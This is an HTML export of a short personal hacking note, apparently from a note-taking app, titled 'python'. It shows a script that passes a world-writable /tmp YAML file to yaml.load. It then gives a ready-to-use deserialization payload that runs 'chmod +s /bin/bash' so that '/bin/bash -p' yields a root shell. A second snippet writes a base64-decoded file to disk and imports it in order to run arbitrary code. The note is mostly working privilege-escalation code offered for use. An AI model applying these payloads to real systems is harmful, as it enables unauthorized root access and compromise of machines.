<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>python</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>python</h1>

      <div class="ck-content">
        <p>For a python script, running a <code>yaml</code> module, like below:</p><pre><code class="language-text-plain">#!/usr/bin/python
import yaml
class Execute():
        def __init__(self,file_name ="/tmp/file.yml"):
                self.file_name = file_name
                self.read_file = open(file_name ,"r")
        def run(self):
                return self.read_file.read()
data  = yaml.load(Execute().run())</code></pre>

        <p>use payload <code>!!python/object/apply:os.system ["chmod +s /bin/bash"]</code> in <code>/tmp/file.yml</code> to
          set suid on bash and get root with <code>/bin/bash -p</code>

        </p><pre><code class="language-text-x-python">f = open("test.py",'w')
f.write(__import__("base64").b64decode("&lt;BASE64_FILE&gt;").decode('utf-8'))
f.close()
p=__import__("os").getcwd()
__import__("sys").path.append(p)
__import__("test").a()</code></pre>
      </div>
    </div>
  </body>

</html>